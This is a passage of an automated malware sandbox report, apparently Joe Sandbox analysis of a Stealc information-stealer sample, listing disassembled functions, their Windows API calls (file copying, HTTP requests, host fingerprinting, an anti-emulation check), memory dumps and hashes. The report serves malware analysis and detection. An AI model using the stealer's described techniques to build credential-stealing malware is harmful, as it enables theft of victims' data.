Part of subcall function 006A4910: lstrcatA.KERNEL32(?,006B0FF8), ref: 006A4A5C
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,?), ref: 006A4A70
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,006B0FFC), ref: 006A4A82
Part of subcall function 006A4910: lstrcatA.KERNEL32(?,?), ref: 006A4A96
Part of subcall function 006A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 006A4AAC
Part of subcall function 006A4910: DeleteFileA.KERNEL32(?), ref: 006A4B31

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A4A07

Strings

Uaj, xrefs: 006A4C2F, 006A4C64, 006A4C9A, 006A4CCF, 006A4D05, 006A4D3A, 006A4D5F, 006A4C32, 006A4C67, 006A4C9D, 006A4CD2, 006A4D08, 006A4D3D

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: Uaj
API String ID: 2104210347-1152903145
Opcode ID: 10e3a21a81816cb62c0c350ab4860bc44ad64d01565f4049cb7118e376a38102
Instruction ID: 1533eda5cb837b6bb638fe1286cd33715396c2908801765af55ab0e52396c6cc
Opcode Fuzzy Hash: 10e3a21a81816cb62c0c350ab4860bc44ad64d01565f4049cb7118e376a38102
Instruction Fuzzy Hash: 4241A7F65001046BDBD8F7A4EC42EEE333EB785700F50864DB54557186EE755B888BA2

Function 006A51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 00696280: InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
Part of subcall function 00696280: StrCmpCA.SHLWAPI(?,00A0D880), ref: 00696303
Part of subcall function 00696280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
Part of subcall function 00696280: HttpOpenRequestA.WININET(00000000,GET,?,00A11BC8,00000000,00000000,00400100,00000000), ref: 00696385
Part of subcall function 00696280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
Part of subcall function 00696280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228

Strings

ERROR, xrefs: 006A5273
ERROR, xrefs: 006A521A

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 5b51ed6be6be81a6c82bc46c0ca5b55321cd794a2bd49d846c57fd423f92732e
Instruction ID: 8a6a0cc220ce26a1bba29950caf4330d8072dce9de8b4fbaca82e409695d226c
Opcode Fuzzy Hash: 5b51ed6be6be81a6c82bc46c0ca5b55321cd794a2bd49d846c57fd423f92732e
Instruction Fuzzy Hash: D5112E70900108ABCB94FFA4DD52AED737AAF52340F90415DF90B5A592EF34AF06CE95

Function 006A5050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 006A508A
lstrcatA.KERNEL32(?,00A10518), ref: 006A50A8

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

Strings

aj, xrefs: 006A50CF, 006A50F4, 006A50D2

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: aj
API String ID: 2699682494-900744764
Opcode ID: ed3271d8f58dc03f428f25a3ac9dcae066f2a89e7a56b6cf35d6d34d48b8f5a4
Instruction ID: 696f84fa6d8792fbcefee88310954a1f68a54b25830b043045a29ef8b336193c
Opcode Fuzzy Hash: ed3271d8f58dc03f428f25a3ac9dcae066f2a89e7a56b6cf35d6d34d48b8f5a4
Instruction Fuzzy Hash: 9E0188B69002085BCB94FBB0DC42EEE737DAB55300F004659B64A57191EE749A88CFA6

Function 006A78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006A6A2B), ref: 006A7910
HeapAlloc.KERNEL32(00000000,?,?,?,006A6A2B), ref: 006A7917
GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
Instruction ID: 8007cfe01c93950f1203c5efa1ddae98d6dbb91b2b70e65d3cc28569b862a39e
Opcode Fuzzy Hash: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
Instruction Fuzzy Hash: 6C0186B1904204EFC714EF94DD45BABFBB8F705B11F10422AF945E3280C37559008BA1

Function 6C0C3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C0C3095

Part of subcall function 6C0C35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C14F688,00001000), ref: 6C0C35D5
Part of subcall function 6C0C35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0C35E0
Part of subcall function 6C0C35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0C35FD
Part of subcall function 6C0C35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0C363F
Part of subcall function 6C0C35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0C369F
Part of subcall function 6C0C35A0: __aulldiv.LIBCMT ref: 6C0C36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0C309F

Part of subcall function 6C0E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B85
Part of subcall function 6C0E5B50: EnterCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B90
Part of subcall function 6C0E5B50: LeaveCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5BD8
Part of subcall function 6C0E5B50: GetTickCount64.KERNEL32 ref: 6C0E5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0C30BE

Part of subcall function 6C0C30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C0C3127
Part of subcall function 6C0C30F0: __aulldiv.LIBCMT ref: 6C0C3140

Part of subcall function 6C0FAB2A: __onexit.LIBCMT ref: 6C0FAB30

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: cefcc535dcca2a1ad13b17a884e9f67a4be02d32bb55b0d3931ac6d0b4183f41
Instruction ID: 405cbc55cd8ee56103a274bf84afadb9df85405016ca4646ee7e85ac96beaf12
Opcode Fuzzy Hash: cefcc535dcca2a1ad13b17a884e9f67a4be02d32bb55b0d3931ac6d0b4183f41
Instruction Fuzzy Hash: BFF0D622E2074496CB10FF7498412EAB3B1EF6F21CF109729E86853611FB2071D99386

Function 006A9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 006A9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 006A94A5
CloseHandle.KERNEL32(00000000), ref: 006A94AF

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 8734e165dd4c2a5b05d40f1807b35e78b9eb4b7c7deb9f8e19ae3ff58cb62416
Instruction ID: d70fc6d671d5f1b689ec5d3a887d32b0934a090dd1444be73c8eed70df4b2ebe
Opcode Fuzzy Hash: 8734e165dd4c2a5b05d40f1807b35e78b9eb4b7c7deb9f8e19ae3ff58cb62416
Instruction Fuzzy Hash: FBF0547490020CFBDB08EF94DC4AFED77B8FB08300F104559BA1957290D6B05E85DB91

Function 00691110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,006A6A1C), ref: 0069112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,006A6A1C), ref: 00691132
ExitProcess.KERNEL32 ref: 00691143

Memory Dump Source

Source File: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Offset: 00690000, based on PE: true

Associated: 00000007.00000002.3110892989.0000000000690000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111010128.00000000006BB000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000006EA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000715000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000718000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000071F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000722000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000741000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000074D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000772000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000077F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000079F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AB000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000007AE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000835000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.0000000000855000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.000000000085B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3111046427.00000000008DA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.3112069879.00000000008EC000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_690000_stealc_default2.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
Instruction ID: dca99fcc5597cb549ee226a7c0b871d762300e1592bc26c2c6d4db394eebddeb
Opcode Fuzzy Hash: 50d153cdeb55300953ed4378dbc5dc52c087853eb0af92e204e231dfb8ef6465
Instruction Fuzzy Hash: 82E0867094630CFFEB146BA19C0EB08777CBB04B01F300155FB087A5C0CAB526009699

Function 006A1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(k,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlenA.KERNEL32(?,006B1110,?,00000000,006B0AEF), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,k), ref: 006AA905

Part of subcall function 006A7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 006A7542
Part of subcall function 006A7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006A757F
Part of subcall function 006A7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7603
Part of subcall function 006A7500: HeapAlloc.KERNEL32(00000000), ref: 006A760A

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcatA.KERNEL32(00000000), ref: 006AA982

Part of subcall function 006A7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A76A4
Part of subcall function 006A7690: HeapAlloc.KERNEL32(00000000), ref: 006A76AB

Part of subcall function 006A77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,006ADBC0,000000FF,?,006A1C99,00000000,?,00A10BD0,00000000,?), ref: 006A77F2
Part of subcall function 006A77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,006ADBC0,000000FF,?,006A1C99,00000000,?,00A10BD0,00000000,?), ref: 006A77F9

Part of subcall function 006A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006911B7), ref: 006A7880
Part of subcall function 006A7850: HeapAlloc.KERNEL32(00000000,?,?,?,006911B7), ref: 006A7887
Part of subcall function 006A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 006A789F

Part of subcall function 006A78E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006A6A2B), ref: 006A7910
Part of subcall function 006A78E0: HeapAlloc.KERNEL32(00000000,?,?,?,006A6A2B), ref: 006A7917
Part of subcall function 006A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Part of subcall function 006A7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E00,00000000,?), ref: 006A79B0
Part of subcall function 006A7980: HeapAlloc.KERNEL32(00000000,?,?,?,?,006B0E00,00000000,?), ref: 006A79B7
Part of subcall function 006A7980: GetLocalTime.KERNEL32(?,?,?,?,?,006B0E00,00000000,?), ref: 006A79C4
Part of subcall function 006A7980: wsprintfA.USER32 ref: 006A79F3

Part of subcall function 006A7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00A10410,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7A63
Part of subcall function 006A7A30: HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,00A10410,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A6A
Part of subcall function 006A7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00A10410,00000000,?,006B0E10,00000000,?,00000000,00000000,?), ref: 006A7A7D

Part of subcall function 006A7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00A10410,00000000,?,006B0E10,00000000,?,00000000,00000000), ref: 006A7B35

Part of subcall function 006A7B90: GetKeyboardLayoutList.USER32(00000000,00000000,006B05AF), ref: 006A7BE1
Part of subcall function 006A7B90: LocalAlloc.KERNEL32(00000040,?), ref: 006A7BF9
Part of subcall function 006A7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 006A7C0D
Part of subcall function 006A7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006A7C62
Part of subcall function 006A7B90: LocalFree.KERNEL32(00000000), ref: 006A7D22

Part of subcall function 006A7D80: GetSystemPowerStatus.KERNEL32(?), ref: 006A7DAD

GetCurrentProcessId.KERNEL32(00000000,?,00A10DF0,00000000,?,006B0E24,00000000,?,00000000,00000000,?,00A10248,00000000,?,006B0E20,00000000), ref: 006A207E

Part of subcall function 006A9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 006A9484
Part of subcall function 006A9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 006A94A5
Part of subcall function 006A9470: CloseHandle.KERNEL32(00000000), ref: 006A94AF

Part of subcall function 006A7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7E37
Part of subcall function 006A7E00: HeapAlloc.KERNEL32(00000000), ref: 006A7E3E
Part of subcall function 006A7E00: RegOpenKeyExA.KERNEL32(80000002,00A0B690,00000000,00020119,?), ref: 006A7E5E
Part of subcall function 006A7E00: RegQueryValueExA.KERNEL32(?,00A10B10,00000000,00000000,000000FF,000000FF), ref: 006A7E7F
Part of subcall function 006A7E00: RegCloseKey.ADVAPI32(?), ref: 006A7E92

Part of subcall function 006A7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 006A7FC9
Part of subcall function 006A7F60: GetLastError.KERNEL32 ref: 006A7FD8

Part of subcall function 006A7ED0: GetSystemInfo.KERNEL32(006B0E2C), ref: 006A7F00
Part of subcall function 006A7ED0: wsprintfA.USER32 ref: 006A7F16

Part of subcall function 006A8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00A10260,00000000,?,006B0E2C,00000000,?,00000000), ref: 006A8130
